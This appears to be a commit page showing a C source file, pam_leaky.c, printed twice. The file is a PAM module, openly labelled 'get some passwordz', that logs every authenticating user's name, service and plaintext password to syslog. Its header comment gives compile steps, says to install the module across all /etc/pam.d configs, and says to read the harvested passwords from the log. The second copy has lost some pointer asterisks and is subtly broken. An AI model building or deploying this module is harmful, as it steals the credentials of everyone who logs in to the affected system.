arirubinstein · March 2, 2013 00:33
diff --git a/pam_leaky.c b/pam_leaky.c
 /*
 
  pam_leaky = get some passwordz

  Mac: compile with: ${CC} -lpam -bundle -flat_namespace -undefined suppress -o pam_leaky.so pam_leaky.c

  place .so in /usr/lib/pam

  put this at the end of everything in /etc/pam.d/ *
  auth       required       pam_leaky.so

  profit: syslog | grep leaky
 */


 /* support for everythings! */
 #define PAM_SM_ACCOUNT
 #define PAM_SM_AUTH
 #define PAM_SM_PASSWORD
 #define PAM_SM_SESSION

 #include <security/pam_appl.h>
 #include <security/pam_modules.h>
 #include <syslog.h>

 int pam_sm_open_session(pam_handle_t *pamh, int flags, int argc, const char **argv) {
      return(PAM_IGNORE);
 }

 int pam_sm_close_session(pam_handle_t *pamh, int flags, int argc, const char **argv) {
      return(PAM_IGNORE);
 }

 int pam_sm_acct_mgmt(pam_handle_t *pamh, int flags, int argc, const char **argv) {
      return(PAM_IGNORE);
 }

 int pam_sm_authenticate(pam_handle_t *pamh, int flags, int argc, const char **argv) {
      const char *pam_user = NULL;
      const char *pam_pass = NULL;
      const char *pam_service = NULL;
      int pam_err;

      openlog("pam_leaky", 0, LOG_AUTHPRIV);

      pam_err = pam_get_item(pamh, PAM_SERVICE, (const void **)&pam_service);
      syslog(LOG_WARNING, "pam_leaky Service: %s", pam_service);

      pam_err = pam_get_user(pamh, &pam_user, NULL);
      syslog(LOG_WARNING, "pam_leaky User: %s", pam_user);

      pam_err = pam_get_item(pamh, PAM_AUTHTOK, (const void **)&pam_pass);
      syslog(LOG_WARNING, "pam_leaky Pass: %s", pam_pass);

      closelog();

      return(PAM_IGNORE);
 }

 int pam_sm_setcred(pam_handle_t *pamh, int flags, int argc, const char **argv) {
      return(PAM_IGNORE);
 }

 /* PAM entry point for authentication token (password) changes */
 int pam_sm_chauthtok(pam_handle_t *pamh, int flags, int argc, const char **argv) {
      return(PAM_IGNORE);
 }
	/*

	pam_leaky = get some passwordz

	Mac: compile with: ${CC} -lpam -bundle -flat_namespace -undefined suppress -o pam_leaky.so pam_leaky.c

	place .so in /usr/lib/pam

	put this at the end of everything in /etc/pam.d/ *
	auth required pam_leaky.so

	profit: syslog \| grep leaky
	*/


	/* support for everythings! */
	#define PAM_SM_ACCOUNT
	#define PAM_SM_AUTH
	#define PAM_SM_PASSWORD
	#define PAM_SM_SESSION

	#include <security/pam_appl.h>
	#include <security/pam_modules.h>
	#include <syslog.h>

	int pam_sm_open_session(pam_handle_t pamh, int flags, int argc, const char *argv) {
	return(PAM_IGNORE);
	}

	int pam_sm_close_session(pam_handle_t pamh, int flags, int argc, const char *argv) {
	return(PAM_IGNORE);
	}

	int pam_sm_acct_mgmt(pam_handle_t pamh, int flags, int argc, const char *argv) {
	return(PAM_IGNORE);
	}

	int pam_sm_authenticate(pam_handle_t pamh, int flags, int argc, const char *argv) {
	const char *pam_user = NULL;
	const char *pam_pass = NULL;
	const char *pam_service = NULL;
	int pam_err;

	openlog("pam_leaky", 0, LOG_AUTHPRIV);

	pam_err = pam_get_item(pamh, PAM_SERVICE, (const void **)&pam_service);
	syslog(LOG_WARNING, "pam_leaky Service: %s", pam_service);

	pam_err = pam_get_user(pamh, &pam_user, NULL);
	syslog(LOG_WARNING, "pam_leaky User: %s", pam_user);

	pam_err = pam_get_item(pamh, PAM_AUTHTOK, (const void **)&pam_pass);
	syslog(LOG_WARNING, "pam_leaky Pass: %s", pam_pass);

	closelog();

	return(PAM_IGNORE);
	}

	int pam_sm_setcred(pam_handle_t pamh, int flags, int argc, const char *argv) {
	return(PAM_IGNORE);
	}

	/* PAM entry point for authentication token (password) changes */
	int pam_sm_chauthtok(pam_handle_t pamh, int flags, int argc, const char *argv) {
	return(PAM_IGNORE);
	}